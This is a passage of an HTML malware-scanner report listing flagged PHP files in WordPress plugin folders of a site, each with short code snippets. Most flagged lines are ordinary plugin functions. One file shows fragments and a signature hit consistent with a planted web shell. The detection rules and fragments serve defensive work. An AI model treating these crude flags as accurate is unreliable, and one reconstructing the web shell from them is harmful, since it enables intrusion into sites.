<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_htaccess</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 183</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_protective_files_array</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 192</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$response</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_protective_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 198</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 200</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 204</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_root_response_code</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 215</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_htaccess_content</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 217</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">file_get_contents</span><span style="color: #007700">(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">get_uploads_dir</span><span style="color: #007700">() . </span><span style="color: #DD0000">'/.htaccess'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_submenu_page</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 220</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_htaccess_is_self_generated</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 230</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_uploads_is_protected</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_protective_file_removable</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 266</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_protection_message_array</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 26</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">render_settings_page</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 271</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns 403 code</span><span style="color: #007700">.</span><span style="color: #DD0000">', $this->plugin_name);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_apache</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 292</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'apache_get_modules'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 298</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_message</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">'updated'</span><span style="color: #007700">, </span><span style="color: #0000BB">$id </span><span style="color: #007700">= </span><span style="color: #0000BB">0</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 307</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">display_messages</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 312</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'<div id="message" class="' </span><span style="color: #007700">. </span><span style="color: #0000BB">$message</span><span style="color: #007700">[</span><span style="color: #DD0000">'type'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'"><p>' </span><span style="color: #007700">. </span><span style="color: #0000BB">$message</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'</p></div>'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enqueue_styles</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 36</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_settings_link</span><span style="color: #007700">(</span><span style="color: #0000BB">$links</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$links</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_dir</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$uploads_dir</span><span style="color: #007700">[</span><span style="color: #DD0000">'basedir'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_url</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$uploads_dir</span><span style="color: #007700">[</span><span style="color: #DD0000">'baseurl'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_subdirectories</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 71</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$subs</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 74</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">save_form</span><span style="color: #007700">(</span><span style="color: #0000BB">$form</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 89</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_htaccess_identifier</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 91</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"[plugin_name=" </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name </span><span style="color: #007700">. </span><span style="color: #DD0000">"]"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 94</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">create_index</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_208").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/fyrkg/admin/views/protect-uploads-admin-settings-page.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.62 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:37:52</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:37:52</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_209" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns 403 code </span><span style="color: #007700">(</span><span style="color: #0000BB">Forbidden Access</span><span style="color: #007700">).</span><span style="color: #DD0000">', $this->plugin_name); ?></p> </label><br /> } ?> <!-- --> if ( $this->check_protective_file_removable() && $this->check_uploads_is_protected() ) { ?> <label for="protection_3"> <input type="radio" value="remove" nam</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 63</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns 403 code </span><span style="color: #007700">(</span><span style="color: #0000BB">Forbidden Access</span><span style="color: #007700">).</span><span style="color: #DD0000">', $this->plugin_name); ?></p></span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_209").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/fyrkg/uninstall.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.27 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:37:52</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:37:52</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_210" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { </span><span style="color: #0000BB">$plugin_name </span><span style="color: #007700">= </span><span style="color: #DD0000">'protect-uploads'</span><span style="color: #007700">; if( </span><span style="color: #0000BB">is_admin</span><span style="color: #007700">()) </span><span style="color: #0000BB">delete_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$plugin_name </span><span style="color: #007700">. </span><span style="color: #DD0000">'-protection' </span><span style="color: #007700">); } } </span><span style="color: #0000BB">Alti_ProtectUploads_Uninstall</span><span style="color: #007700">::</span><span style="color: #0000BB">run</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_210").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/fyrkg/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 26.19 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:37:52</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:37:52</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_211" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">; } </span><span style="color: #0000BB">?></span> </div> </body> </html></span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 376</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #DD0000">");</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 383</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">author</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 393</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekdir</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 400</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='writable'>writable</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 402</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='readonly'>readonly</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 406</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekroot</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 414</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">xrmdir</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 430</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">green</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 434</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">red</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 742</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">statusnya</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 446</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_211").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/gbdud/includes/class-protect-uploads-i18n.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 684.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-30 09:59:37</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-30 09:59:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_212" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
